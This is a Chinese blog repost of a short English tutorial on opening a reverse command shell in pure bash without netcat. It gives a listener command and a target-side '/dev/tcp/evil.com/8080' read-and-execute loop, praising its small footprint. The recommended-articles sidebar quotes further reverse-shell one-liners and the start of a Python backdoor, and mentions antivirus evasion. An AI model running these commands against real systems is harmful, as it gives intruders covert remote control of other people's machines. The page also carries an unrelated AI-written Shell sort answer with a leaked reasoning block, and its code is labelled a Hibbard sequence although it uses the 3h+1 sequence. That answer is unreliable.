Reverse Shell with Bash

最新推荐文章于 2025-06-02 13:29:35 发布
转载 最新推荐文章于 2025-06-02 13:29:35 发布 · 910 阅读 · 0
文章标签:

#shell #bash #network #descriptor #command #service

本文介绍了一种不依赖第三方工具如Netcat的情况下,在目标系统上创建反向命令Shell的方法。通过使用Bash自身的功能,该技术可以为渗透测试者提供一种隐蔽且有效的远程访问手段。

http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.neohapsis.com%2F2008%2F04%2F17%2Fconnect-back-shell-literally%2F&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=

I am stuck at the Dubai International Airport and I have nothing else interesting to do. So, I though I might share a simple technique which will go into the Agile Hacking project. Here I will show you how to create a reverse command shell without using 3rd-party tools such as the all mighty netcat. Please read on!

FreeBSD unix

When the pentester compromises a machine they often need to provide themselves with a user friendly access to the system. This is where command shells come into place. It is worth noting that there are a couple of variants of command shells. The typical shell consists of a generic network client, typically netcat, listening on a remote port which pipes output into something like bash. Another type of shell, which is known to be suitable when the pentester is restricted in terms of network service connectivity/availability, is the reverse shell which consists of a generic network client, again something like netcat, connecting to the attacker’s machine and piping input to bash. Most of the time, the attacker will use netcat, because this is the tool that is suggested in most security references and books.

Although netcat is quite useful, and you may have to use it in most cases, here is a simple technique which emulates what exactly netcat does but it relies on bash only. Let’s see how.

  • In step one we start a listening service on our box. We can use netcat, or whatever you might have in hand. 
    $ nc -l -p 8080 -vvv
  • On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor. 
    $ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done

There you go. Now everything we type in our local listening server will get executed on the target and the output of the commands will be piped back. Keep in mind that we don’t use any 3rd-party tools on the target but its default shell. This technique comes extremely handy in many situations and it leaves very small footprint on the targeted system.

cnbird2008
关注
reverse-shell-generator:基于Web的反向shell生成器
02-05
reverse-shell-generator:基于Web的反向shell生成器
linux反弹shell
qq_52072846的博客
11-26 1835
linux反弹shell 在攻击主机上执行端口监听 nc -lvvp port 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1
Reverse Shell
qq_67812668的博客
08-07 1312
Reverse shell是一种远程访问技术,其基本原理是让攻击者通过网络连接到受害者电脑的命令行界面或者终端进行操作,而不需要直接访问被攻击者的电脑。攻击者通过将特定的代码注入到受害者电脑中,以建立与其的通信通道,然后与受害者电脑的命令行界面或终端进行交互,达到对其进行控制的目的。Reverse shell通常被黑客用来远程控制被攻击的计算机,执行恶意代码、窃取敏感信息、修改、删除或传输文件、升级权限等行为。
Reverse Shell 杂谈
有价值炮灰
12-06 1338
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 `/dev/tcp` 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
反弹Shell
永远相信美好的事情即将发生
11-19 391
反弹shellreverse shell)就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。对于以上几种情况,我们是无法利用正向连接的,要用反向连接。所谓正向连接,就是攻击机去连目标机。那么反向连接就很好理解了,就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。
反弹shell
热门推荐
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
Reverse-shell WP
qq_41252520的博客
08-09 370
前言 非常感谢子昂师傅分享的wp,从中学习到了一种逆向的思路。 关于此题,我主要打算讲三点: 1.脱壳 2.关键函数该怎么找 3.golang编写的程序的一些特点 分析 【查壳】 64位程序加了UPX壳,我是头一次遇见的,没什么好的工具管用,只能x64gdb手脱。 可是这个程序有些奇怪,一开始断下来的位置并不属于用户态 这点与32位程序加了UPX后的不同。尝试使用ESP定律脱壳,在x64db...
一对简单的 reverse shell / shell
cloudzk的博客
11-27 3901
一对入门级别的 reverse shell (反弹shell)和 shell (控制端)。 1、reverse shell (反弹端 client): 入侵者用于成功入侵后放置于受控PC上的反弹程序,相当于一个backdoor,reverse shell把受控PC的信息通过网络反弹至入侵者远程管理控制端。代码如下: #!/usr/bin/python import socket, subproces
Python 渗透测试:反弹 shell (反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 3103
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
reverse shell思路
b10d9的博客
12-03 574
今天在做靶机练习的时候,遇到了在回连shell的时候,使用常用的reverse shell连接失败了。整理了以下思路。通过以下思路判断为何失效,并更新reverse shell内容。(不一定全,欢迎补充) 1. 利用phpinfo()来获取PHP的配置信息。 PHP:<?php phpinfo(); ?> 查看是否具备包含远程文件的条件:allow_url_fopen/allow_url_include是否开启。 查看是否有禁用的函数:disable_functions,重要
黑客零基础第一章--反向shell
ShadowBlade
08-09 5148
一篇文章叫你完全掌握反向shell
什么是反弹shell
qq_30503389的博客
06-06 2504
反弹ShellReverse Shell)是一种网络攻击技术,用于通过远程主机上的Shell(命令行终端)与攻击者建立连接,从而控制受攻击主机。攻击者通常在受攻击主机上以各种方式植入恶意代码(如后门程序),然后通过网络与该主机上运行的Shell建立反向连接,从而获得对该主机的完全控制权。反弹Shell技术通常是针对目标主机的防火墙和安全措施进行攻击。攻击者首先在目标主机上放置一个能够向外发起TCP或UDP连接的恶意程序,并将其设定为在特定条件下自动启动。
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 8865
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹 ShellReverse Shell)原理与实战详解
chaoqun3的博客
06-02 1624
反弹 Shell 是指被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell;将其所有输出(stdout 和 stderr)发送给攻击者;将攻击者作为输入源(stdin),实现远程控制。核心要点描述反弹 Shell 的本质。
ReverseTcpshell使用教程
m0_53087192的博客
03-11 546
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
Reverse shell升级成 完全交互式 TTY
weixin_43851945的博客
01-22 3256
Reverse shell升级成交互式 TTY 作者: Ikonw 正常来说普通的reverse shell 都有以下的一些缺点 无法使用的文本管理器 比如 VI 没有Tab键自动完成(痛苦啊) 不能用上下方向键 来选择历史记录(每次输错了都要重新打啊) su 无法执行 如果shell卡住的话 按ctrl + c 会直接导致你的shell 死亡 这边我举个例子 可以利用 python 的 p...
bash】倒转一个字符串列表
dragonbooker的专栏
04-17 650
<br />前有一个字符串str_list="one two three", 现在想将这个字符串列表翻转下,变为rev_str_list="three two one"。可以使用bash shell的数组特性完成。<br /> <br />代码如下:<br /> <br />reverse_list()<br />{<br />    local array=( $str_list )                       # 构建一个数组<br />    let " arr_count = ${#
渗透测试--反弹shell(1)
weixin_43520214的博客
09-18 1388
反弹shellReverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
如何使用NetCat或BASH创建反向Shell来执行操作
weixin_34390996的博客
12-21 420
反向shell(Reverse shell)是一种往远程机器发送shell命令的技术,当远程机器处在防火墙等其它东西后面时,这种技术会变得非常有用。你也许会说,“一个普通的shell或简单的SSH通道不是也能实现这些吗?”不,无法实现。在网上,我看到很多人对普通shell和反向shell之间的区别分不清。在我们开始下面的内容前,先弄清楚这些概念。反向Shell(Reverse...
shell sort正序倒序
最新发布
09-02
<think> Hmm, the user is asking about implementing Shell sort in both ascending and descending orders. Let me look at the references they provided. Reference [1] mentions the Linux sort command options like -n and -r, which is interesting but not directly about Shell sort implementation. References [2] and [3] discuss bubble sort and quick sort respectively, while reference [4] actually contains Shell sort code - perfect! The user seems to be learning different sorting algorithms. Given they specifically asked about Shell sort's direction control, they're probably comparing sorting methods or working on a programming task. The request is quite precise - they want both ascending and descending implementations. Looking at reference [4]'s Shell sort code, the core logic uses an insertion-sort-like approach within decreasing gaps. For ascending order, it shifts elements when key < arr[j-inc]. To reverse it, I just need to flip that comparison to key > arr[j-inc]. I should explain both implementations clearly, keeping the gap sequence discussion simple but mentioning common choices like Knuth's formula. The user might also appreciate seeing how the direction control compares to other sorts like in reference [2]'s bubble sort with its reverse traversal approach. Better include concrete code examples since reference [4] shows C++ and they seem comfortable with code. Should use clear variable names and comments. The time complexity note from reference [4] is worth keeping too - O(n^{3/2}) and unstable nature. For the related questions section, performance analysis and gap sequence choices would naturally follow from this topic. The Linux sort command reference [1] suggests they might be interested in real-world applications too. The user appears technical but might need the key modification point (the comparison flip) highlighted clearly. No signs of frustration - seems like a straightforward learning query. Better keep the tone helpful but precise. </think> 基于引用内容,Shell Sort(希尔排序)的正序与倒序实现主要通过**比较逻辑的方向控制**实现,以下是具体方法和代码实现: --- ### **一、Shell Sort 正序(升序)实现** **核心逻辑**:元素后移条件为 `key < arr[j-gap]`(小值前移) **引用参考**:引用[4]中 `key < arr[j-inc]` 实现升序排序 ```c void shellSort_asc(int arr[], int n) { for (int gap = n/2; gap > 0; gap /= 2) { // 动态缩小间隔 for (int i = gap; i < n; i++) { int key = arr[i]; int j; // 若当前元素小于前隔gap位的元素,则后移较大值 for (j = i; j >= gap && key < arr[j-gap]; j -= gap) { arr[j] = arr[j-gap]; // 较大值后移 } arr[j] = key; // 插入正确位置 } } } ``` --- ### **二、Shell Sort 倒序(降序)实现** **核心修改**:翻转比较条件为 `key > arr[j-gap]`(大值前移) ```c void shellSort_desc(int arr[], int n) { for (int gap = n/2; gap > 0; gap /= 2) { for (int i = gap; i < n; i++) { int key = arr[i]; int j; // 修改条件:当前元素大于前隔gap位的元素时后移较小值 for (j = i; j >= gap && key > arr[j-gap]; j -= gap) { arr[j] = arr[j-gap]; // 较小值后移 } arr[j] = key; // 插入正确位置 } } } ``` --- ### **关键区别对照表** | 操作 | 正序条件 | 倒序条件 | 目标 | |--------------|------------------------|------------------------|--------------------------| | **比较逻辑** | `key < arr[j-gap]` | `key > arr[j-gap]` | 控制前移元素的大小方向 | | **数据移动** | 后移**较大值** | 后移**较小值** | 实现升序/降序的排列 | > **稳定性说明**:Shell Sort 是不稳定排序(引用[4]),相同元素在排序后相对位置可能改变。 --- ### **三、扩展应用** 1. **动态间隔序列优化** 可替换 `gap = n/2` 为更高效的序列(如Hibbard序列): ```c int gap = 1; while (gap < n/3) gap = gap*3 + 1; // 生成Hibbard序列 ``` 2. **组合命令实现**(引用[1]) 在Linux中直接使用 `sort` 命令: ```bash sort -n file.txt # 正序(数值排序) sort -nr file.txt # 倒序(数值逆序) ``` --- **相关问题** 1. Shell Sort 的时间复杂度如何分析?不同间隔序列对性能有何影响? 2. 如何证明 Shell Sort 是不稳定排序算法? 3. Shell Sort 与插入排序相比有哪些改进?在什么场景下更具优势? [^3][^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值